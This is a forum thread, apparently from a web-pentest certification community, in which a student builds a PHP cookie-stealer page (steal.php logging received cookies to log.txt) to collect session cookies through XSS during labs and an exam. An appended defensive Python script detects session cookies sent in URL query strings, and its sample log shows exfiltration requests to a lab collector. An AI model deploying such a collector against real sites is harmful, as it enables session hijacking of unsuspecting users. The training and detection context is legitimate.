Creating an attacker.site page?

cr8syoki

I am attempting to make a page that will catch session IDs/cookies from XSS payloads and to use for some of the XSRF tutorials like in the videos for the WAPT cert. I have created a few barebones pages myself to test on, and would like to use something similar instead of the given sites for the labs.

Anyone have any experience in this or pointers? I have searched Google for creating a page like this, but have come up empty.

dimitrios

Hi @cr8syoki,

Please describe the scenario you are trying to implement and I will guide you through the process...

What steps does the attack you are trying to implement involve?

cr8syoki

I would like to set up the page for XSS payloads similar to those that we see in our labs here that send the cookies back to a site that has a .txt file on it.

My instinct tells me I may need to go through one of the free web hosting sites, but I am not sure if the sites can be used for that.

I would like to get past just the normal XSS payloads and learn to send the info to the site that would be on a local server.

As I progress, I would like to have this handy for testing remote file inclusion payloads in my personal home lab.

Much appreciated for the response. I have tried a number of ways to Google/research this before I posted.

caneacsu

Everything you need to know to make this work is taught in the course. If you went through the labs and understood them, you should be in good shape to replicate some of the functionalities in your own lab.

cr8syoki

Apologies for re-opening this thread. I was able to create a PHP cookie stealer using localhost for the PHP page. I am using the following:

<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>

This file is named steal.php. I have also created a blank file named log.txt and chmod 777 that file. I moved both files into the same directory under /var/www/html/stealer/

So it would appear as 127.0.0.1/stealer/steal.php

I am currently taking the exam and have found areas I believe will have the admin browsing the site to steal the cookies. Upon starting Apache and inserting my payload, I am not seeing anything in the log.txt. I have also tried this payload in WebGoat to see if it is my code or the exam. Obviously it appears I have messed up somewhere in my code.

@dimitrios, or if someone else who may have a few pointers could let me know where I went wrong, it would be greatly appreciated. I have seen the more elaborate PHP scripts to also steal IP addresses, user-agent, etc. I just did not find those necessary at the time. Just to note, I did have a short period on the exam where I believe my time was suspended, but I do not believe that has anything to do with the payload or needing to reset the exam.

If this needs to be moved to the exam FAQs please let me know.
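
Added example, not part of the original posts: a defender-side check for the pattern discussed above, a browser request that carries a session cookie in a URL query string (as a GET to a page like steal.php would). The log lines, host names and the list of cookie names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: session cookie names used by the applications being monitored.
SESSION_COOKIE_NAMES = {"PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "sessionid"}
# "name=value" pairs as they appear in a document.cookie string.
COOKIE_PAIR = re.compile(r"(?:^|;\s*)([^=;\s]+)=([^;]*)")
# Request line of a combined-format proxy or access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample proxy log (hosts and values are made up for this example).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET http://app.lab.example/index.php?page=2 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET http://collector.lab.example/stealer/steal.php?cookie=PHPSESSID%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 200 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET http://collector.lab.example/stealer/steal.php?cookie=PHPSESSID=def456;%20theme=dark HTTP/1.1" 200 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET http://app.lab.example/search?q=theme%3Ddark HTTP/1.1" 200 128',
]

def leaked_cookie_names(url):
    """Return session cookie names found inside any query-string value of url."""
    found = set()
    # parse_qsl percent-decodes each value, so encoded and raw payloads look alike.
    for _param, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for name, _val in COOKIE_PAIR.findall(value):
            if name in SESSION_COOKIE_NAMES:
                found.add(name)
    return found

def scan(lines):
    """Return (line_number, url, names) for log lines with a session cookie in the URL."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a request line we understand
        names = leaked_cookie_names(m.group(1))
        if names:
            hits.append((n, m.group(1), sorted(names)))
    return hits

if __name__ == "__main__":
    for n, url, names in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)} sent in URL {url}")
```
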

dimitrios

@cr8syoki

If you are taking the exam as we speak, we cannot comment on the code you are using to solve the exam's challenges....
